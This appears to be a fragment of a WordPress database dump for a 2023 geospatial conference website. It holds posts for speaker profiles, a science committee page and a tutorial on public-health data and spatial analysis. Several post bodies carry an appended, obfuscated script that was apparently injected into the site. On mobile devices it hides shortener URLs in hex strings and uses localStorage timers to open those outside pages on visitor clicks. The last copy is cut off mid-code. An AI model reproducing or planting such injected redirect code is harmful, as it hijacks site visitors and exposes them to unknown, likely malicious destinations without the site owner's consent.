(3874,1,'2023-02-07 00:10:15','2023-02-07 00:10:15','<!-- wp:paragraph -->\n<p>University of Calgary, Canada</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Adel Moussa','','publish','closed','closed','','dr-adel-moussa','','','2023-02-07 00:10:19','2023-02-07 00:10:19','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3874',0,'dt_team','',0),
(3875,1,'2023-02-07 00:09:23','2023-02-07 00:09:23','','Dr Adel Moussa Photo','','inherit','open','closed','','dr-adel-moussa-photo','','','2023-02-07 00:09:23','2023-02-07 00:09:23','',3874,'https://gsw2023.com/wp-content/uploads/2023/02/Dr-Adel-Moussa-Photo.jpg',0,'attachment','image/jpeg',0),
(3876,1,'2023-02-07 00:12:30','2023-02-07 00:12:30','','Assoc. Prof. Bassem Sheta','','publish','closed','closed','','assoc-prof-bassem-sheta','','','2023-02-07 00:12:34','2023-02-07 00:12:34','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3876',0,'dt_team','',0),
(3877,1,'2023-02-07 00:11:56','2023-02-07 00:11:56','','Dr Bassem Shita Photo','','inherit','open','closed','','dr-bassem-shita-photo','','','2023-02-07 00:11:56','2023-02-07 00:11:56','',3876,'https://gsw2023.com/wp-content/uploads/2023/02/Dr-Bassem-Shita-Photo.jpg',0,'attachment','image/jpeg',0),
(3878,1,'2023-02-07 00:19:26','2023-02-07 00:19:26','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62, 67, 70, 72\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2023-02-07 00:19:26','2023-02-07 00:19:26','',2876,'https://gsw2023.com/?p=3878',0,'revision','',0),
(3881,1,'2023-02-07 00:52:00','2023-02-07 00:52:00','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-3691\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg\" alt=\"\" width=\"79\" height=\"106\" /></p>\n<p><a href=\"https://gsw2023.com/index.php/dt_team/sameer-saran/\"><strong>Sameer Saran</strong></a></p>\n<p>Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA</p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p><strong>ISPRS Chair, WG IV/10</strong></p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p>Dr. Sameer Saran is a Senior Scientist and Head, Geoinformatics Department at Indian Institute of Remote Sensing (ISRO). He is currently serving as Deputy General Secretary of AARS representing India. He has also served as Co-Chair for ISPRS TC V/3 working group on Geospatial Technology and Citizen Science for the year 2016-22.  His interest is Web GIS, spatial database &amp; modelling, citizen science, 3D city modelling &amp; geo-health.</p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph -->[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3694\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg\" alt=\"\" width=\"75\" height=\"95\" /></p>\n<p class=\"fancy-title entry-title start-animation-done start-animation\">Dr.Frank B Osei</p>\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong> Dr. F. B. Osei is a Faculty of Geo-Information Science and Earth Observation (ITC) in Department of Earth Observation Science (EOS), University of Twente, the Netherlands. He is editorial member of Spatial Statistics, Int. J. of Statistics in Medical Research, Geospatial Health, etc. His research interests are in GIS, geo-health, social sciences, life sciences, earth and environmental sciences.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 